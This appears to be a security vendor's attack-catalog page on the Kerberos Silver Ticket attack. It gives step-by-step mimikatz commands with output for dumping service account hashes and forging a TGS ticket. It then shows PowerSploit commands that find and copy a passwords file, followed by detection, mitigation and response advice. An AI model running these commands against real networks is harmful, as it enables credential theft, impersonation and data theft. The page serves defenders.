1. Home
  2. Resources
  3. Attack Catalog
  4. Silver Ticket Attack

Silver Ticket Attack

Active Directory
Credential Access
Credential Theft
Kerberos

Similar in concept to a Golden Ticket, a Silver Ticket attack involves compromising credentials and abusing the design of the Kerberos protocol. However, unlike a Golden Ticket — which grants an adversary unfettered access to the domain — a Silver Ticket only enables an attacker to forge ticket-granting service (TGS) tickets for specific services. TGS tickets are encrypted with the password hash for the service; therefore, if an adversary steals the hash for a service account, they can mint TGS tickets for that service.

While scope of a Silver Ticket attack may be smaller, it is still a powerful tool in an adversary’s kit, enabling persistent and stealthy access to resources. Since only the service account’s password hash is required, it is also significantly easier to execute than a Golden Ticket attack. Techniques like harvesting hashes from LSASS.exe and Kerberoasting are common ways adversaries obtain service account password hashes.

Threat Summary
Target:
Active Directory
Tools:
mimikatz, impacket, PowerSploit
ATT&CK® Tactic:
Credential Access
ATT&CK Technique:
T1558.002
Difficulty
Detection:
Hard
Mitigation:
Hard
Response:
Medium

Attack Tutorial: How a Silver Ticket Attack Works

STEP 1

Compromise the credentials of a service account

To gain the ability to mint TGS tickets, an adversary must first compromise the password hash of a service account. In this example, an adversary who has compromised a file server now compromises the password hash of a service account: 
PS> .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
 
mimikatz(commandline) # privilege::debug
Privilege '20' OK
 
mimikatz(commandline) # sekurlsa::logonpasswords
# ... output truncated ... #
Authentication Id : 0 ; 29151002 (00000000:01bccf1a)
Session           : Interactive from 5
User Name         : DWM-5
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 21/07/2020 10:26:16
SID               : S-1-5-90-0-5
        msv :
         [00000003] Primary
         * Username : FileServer1$
         * Domain   : DOMAIN
         * NTLM     : 281fd98680ed31a9212256ada413db50
         * SHA1     : c8fe518dfa728eb92eb2566328f0123e3bcb2717
# ... output truncated ... #
 
mimikatz(commandline) # exit
Bye!
STEP 2

Forge Kerberos TGS tickets

Tools like mimikatz can be used to mint Silver Tickets. The process for forging TGS tickets is similar to minting Golden Tickets, and with mimikatz uses the same kerberos::golden method, specifying the password hash of the service account instead of the krbtgt, along with the following parameters:
  • /domain — The fully qualified domain name of the Active Directory domain
  • /sid — The SID of the Active Directory domain
  • /user — The username to impersonate
  • /target — The fully qualified domain name of the server
  • /service — The target service name
  • /rc4 — The NTLM/RC4 password hash
PS> .\mimikatz.exe "kerberos::golden /user:NonExistentUser /domain:domain.com /sid:S-1-5-21-5840559-2756745051-1363507867 /rc4:8fbe632c51039f92c21bcef456b31f2b /target:FileServer1.domain.com /service:cifs /ptt" "misc::cmd" exit
 
mimikatz(commandline) # kerberos::golden /user:NonExistentUser /domain:domain.com /sid:S-1-5-21-5840559-2756745051-1363507867 /rc4:8fbe632c51039f92c21bcef456b31f2b /target:FileServer1.domain.com /service:cifs /ptt
User      : NonExistentUser
Domain    : domain.com (DOMAIN)
SID       : S-1-5-21-5840559-2756745051-1363507867
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 8fbe632c51039f92c21bcef456b31f2b - rc4_hmac_nt
Service   : cifs
Target    : FileServer1.domain.com
Lifetime  : 27/07/2020 12:20:26 ; 25/07/2030 12:20:26 ; 25/07/2030 12:20:26
-> Ticket : ** Pass The Ticket **
 
 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated
 
Golden ticket for 'NonExistentUser @ domain.com' successfully submitted for current session
 
mimikatz(commandline) # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF7767043B8
 
mimikatz(commandline) # exit
Bye!
STEP 3

Use the forged tickets to gain further objectives

In the previous step, the adversary forged a silver ticket and injected it into a new cmd.exe session. The Silver Ticket the attacker minted specified the cifs service, which will allow the attacker to use the forged TGS to access file shares. Because the TGS is forged, it can be created for a user that does not actually exist in the domain, making it harder for responders to track the adversary.

In this example, the adversary uses the forged ticket and the Find-InterestingFile cmdlet from the PowerShell module PowerSploit to scan the file share for sensitive data and exfiltrate it. 
PS> Find-InterestingFile -Path \\FileServer1.domain.com\S$\shares\
 
FullName       : \\FileServer1.domain.com\S$\shares\IT\Service Account Passwords.xlsx
Owner          : DOMAIN\JOED
LastAccessTime : 27/07/2020 12:47:44
LastWriteTime  : 27/07/2020 12:47:44
CreationTime   : 10/04/2011 10:04:50
Length         : 76859
 
PS> Copy-Item -Path "\\FileServer1.domain.com\S$\shares\IT\Service Account Passwords.xlsx" -Destination "C:\Windows\Temp\a20ds3"
PS>

Detect, Mitigate and Respond

Detect
Mitigate
Respond
Difficulty: Hard
The normal process of obtaining a ticket-granting service ticket involves asking a domain controller to generate one. After the caller proves their identity, the domain controller will reply with a TGS encrypted with the service account password. But because the adversary has compromised that password, they can mint TGS tickets without communicating with the domain controller.

Thus, detecting Silver Tickets is possible only on the endpoint and involves examining TGS tickets for subtle signs of manipulation, such as:
  • Usernames that don’t exist
  • Modified (added or removed) group memberships
  • Username and ID mismatches
  • Weaker than normal encryption types or ticket lifetimes that exceed the domain maximum (the domain default lifetime is 10 hours; the mimikatz default is 10 years)
The Windows event log has several audit events that are useful for detecting Silver Tickets:
Event Source Information
Audit Group Membership: Event ID 4627 Member Computers
  • User’s security identifier (SID)
  • Group memberships
Audit Logon: Event ID 4624 Member Computers
  • User’s security identifier (SID)
  • Username
  • Source IP (indicating potentially compromised host)
Difficulty: Hard
Because Silver Tickets abuse the Kerberos protocol, the risk of their use cannot be entirely eliminated. However, several mitigations exist that can make it harder for an adversary to compromise service account password hashes.
  • Adopt strong password hygiene practices for service accounts: Their passwords should be randomly generated, have a minimum of 30 characters and be routinely changed.
  • Enable PAC Validation. Though it has known limitations, there are some situations in which it may assist with the detection and prevention of Silver tickets.
  • Remove end-user administrative privileges on member workstations, and adopt controlled privilege elevation solutions.
  • Reduce administrative access to member workstations and servers to the least required.
  • Use solutions like Microsoft LAPS to create strong, random and unique passwords for local administrator accounts, and automatically rotate them periodically.
  • Apply the recommended mitigations for Kerberoasting.
  • Do not allow users to possess administrative privileges across security boundaries. For example, an adversary who initially compromises a workstation should not be able to escalate privileges to move from the workstation to a server or domain controller.
Difficulty: Medium
If a Silver Ticket is detected, the following response actions should be taken:
  • Activate the incident response process and alert the incident response team.
  • Quarantine any implicated computers for forensic investigation and eradication and recovery activities.
  • Reset the password of the compromised service account.
Detect
Difficulty: Hard
The normal process of obtaining a ticket-granting service ticket involves asking a domain controller to generate one. After the caller proves their identity, the domain controller will reply with a TGS encrypted with the service account password. But because the adversary has compromised that password, they can mint TGS tickets without communicating with the domain controller.

Thus, detecting Silver Tickets is possible only on the endpoint and involves examining TGS tickets for subtle signs of manipulation, such as:
  • Usernames that don’t exist
  • Modified (added or removed) group memberships
  • Username and ID mismatches
  • Weaker than normal encryption types or ticket lifetimes that exceed the domain maximum (the domain default lifetime is 10 hours; the mimikatz default is 10 years)
The Windows event log has several audit events that are useful for detecting Silver Tickets:
Event Source Information
Audit Group Membership: Event ID 4627 Member Computers
  • User’s security identifier (SID)
  • Group memberships
Audit Logon: Event ID 4624 Member Computers
  • User’s security identifier (SID)
  • Username
  • Source IP (indicating potentially compromised host)
Mitigate
Difficulty: Hard
Because Silver Tickets abuse the Kerberos protocol, the risk of their use cannot be entirely eliminated. However, several mitigations exist that can make it harder for an adversary to compromise service account password hashes.
  • Adopt strong password hygiene practices for service accounts: Their passwords should be randomly generated, have a minimum of 30 characters and be routinely changed.
  • Enable PAC Validation. Though it has known limitations, there are some situations in which it may assist with the detection and prevention of Silver tickets.
  • Remove end-user administrative privileges on member workstations, and adopt controlled privilege elevation solutions.
  • Reduce administrative access to member workstations and servers to the least required.
  • Use solutions like Microsoft LAPS to create strong, random and unique passwords for local administrator accounts, and automatically rotate them periodically.
  • Apply the recommended mitigations for Kerberoasting.
  • Do not allow users to possess administrative privileges across security boundaries. For example, an adversary who initially compromises a workstation should not be able to escalate privileges to move from the workstation to a server or domain controller.
Respond
Difficulty: Medium
If a Silver Ticket is detected, the following response actions should be taken:
  • Activate the incident response process and alert the incident response team.
  • Quarantine any implicated computers for forensic investigation and eradication and recovery activities.
  • Reset the password of the compromised service account.
RELATED READING
Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory
Impersonating Service Accounts with Silver Tickets
Fire Image Featured Solutions
Netwrix Threat Manager
Netwrix StealthINTERCEPT
Netwrix Enterprise Auditor
Netwrix Active Directory Security Solution
OTHER ATTACKS
Golden Ticket
Kerberoasting

MITRE ATT&CK® and ATT&CK® are registered trademarks of The MITRE Corporation.